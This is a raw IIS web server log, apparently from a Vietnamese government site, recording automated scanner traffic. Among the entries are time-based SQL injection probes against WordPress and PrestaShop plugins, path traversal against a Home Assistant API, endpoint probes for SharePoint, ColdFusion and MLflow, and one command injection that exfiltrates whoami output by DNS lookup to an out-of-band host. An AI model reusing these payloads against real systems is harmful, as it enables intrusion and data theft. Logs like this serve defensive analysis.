Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 70 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 19:39:31 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 19:39:31 103.153.214.94 POST /inc/jquery/uploadify/uploadify.php - 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 428 2023-11-26 19:39:32 103.153.214.94 POST /attachment/3/accbb.php - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 67 2023-11-26 19:51:20 103.153.214.94 POST / - 443 - 173.239.196.199 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 349 2023-11-26 19:54:36 103.153.214.94 GET /spip.php page=spip_pass 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 71 2023-11-26 20:05:06 103.153.214.94 POST /index.php/management/set_timezone - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn/index.php/management/datetime 405 0 1 69 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 20:20:54 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 20:20:54 103.153.214.94 POST /CFIDE/adminapi/accessmanager.cfc method=foo&_cfclient=true 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 70 2023-11-26 20:23:04 103.153.214.94 GET /wp-admin/admin-ajax.php action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 66 2023-11-26 20:23:05 103.153.214.94 GET /wp-content/plugins/easy-digital-downloads/readme.txt - 443 - 173.239.196.199 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 66 2023-11-26 20:25:15 103.153.214.94 POST /classes/Login.php f=login 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 66 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 20:43:09 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 20:43:09 103.153.214.94 POST /texteditor.php - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 67 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 21:03:39 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 21:03:39 103.153.214.94 GET / - 443 - 101.99.90.158 Mozilla/5.0+(Windows+Phone+8.1;+ARM;+Trident/7.0;+Touch;+rv:11.0;+IEMobile/11.0;+NOKIA;+Lumia+530)+like+Gecko - 200 0 0 577 2023-11-26 21:06:01 103.153.214.94 GET /feed/ - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 http://bcvt.kontum.gov.vn/feed/ 200 0 0 64 2023-11-26 21:07:21 103.153.214.94 GET / - 443 - 54.202.165.132 WDG_Validator/1.6.2 - 200 0 0 716 2023-11-26 21:07:32 103.153.214.94 GET / - 443 - 54.202.165.132 Mozilla/5.0+(Linux;+Android+8.0.0;+SM-A605G)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/100.0.4896.58+Mobile+Safari/537.36 - 200 0 0 224 2023-11-26 21:17:05 103.153.214.94 GET /wp-json/wp/v2/add-listing id=1 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 65 2023-11-26 21:17:05 103.153.214.94 GET /wp-admin/profile.php - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 65 2023-11-26 21:20:57 103.153.214.94 POST /module/jmsblog/index.php action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 70 2023-11-26 21:20:58 103.153.214.94 GET /modules/jmsblog/config.xml - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 80 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 21:37:52 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 21:37:52 103.153.214.94 GET /getsamplebacklog arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).clf0mb8n3tct4nj5icfghot6dbxxa4sbd.oast.online%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22bcvt.kontum.gov.vn%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined 443 - 173.239.196.198 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 67 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 22:01:44 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 22:01:44 103.153.214.94 POST /ajax-api/2.0/mlflow/registered-models/create - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 583 2023-11-26 22:01:46 103.153.214.94 POST /ajax-api/2.0/mlflow/model-versions/create - 443 - 173.239.196.192 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 68 2023-11-26 22:06:13 103.153.214.94 GET /_api/web/siteusers - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 69 2023-11-26 22:06:15 103.153.214.94 GET /_api/web/siteusers - 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 406 0 0 65 2023-11-26 22:13:14 103.153.214.94 GET / - 443 - 3.209.10.111 Opera/9.80+(Linux+i686;+Opera+Mobi/1040;+U;+en)+Presto/2.5.24+Version/10.00 - 200 0 0 295 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 22:32:09 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 22:32:09 103.153.214.94 GET / - 443 - 3.209.10.111 Jigsaw/2.2.5+W3C_CSS_Validator_JFouffa/2.0 - 200 0 0 285 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 23:14:16 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 23:14:16 103.153.214.94 GET / - 443 - 101.99.90.158 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 602 2023-11-26 23:14:19 103.153.214.94 GET / - 443 - 101.99.90.158 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 54 2023-11-26 23:15:05 103.153.214.94 GET / - 443 - 101.99.90.158 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/102.0.0.0+Safari/537.36 - 200 0 0 56 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-26 23:31:08 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-26 23:31:08 103.153.214.94 GET / rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20- 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 78 2023-11-26 23:31:10 103.153.214.94 GET /wp-content/plugins/paid-memberships-pro/js/updates.js - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 63 2023-11-26 23:43:44 103.153.214.94 GET / - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 73 2023-11-26 23:43:46 103.153.214.94 GET /modules/leocustomajax/leoajax.php cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 64 2023-11-26 23:43:52 103.153.214.94 POST /cgi-bin/cstecgi.cgi - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 67 2023-11-26 23:43:54 103.153.214.94 GET /2YXBULDtWUssgiAtbGT0a1Je4VD - 443 - 173.239.196.195 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 63 2023-11-26 23:50:30 103.153.214.94 GET /api/hassio/app/.%2e/supervisor/info - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 400 0 0 2697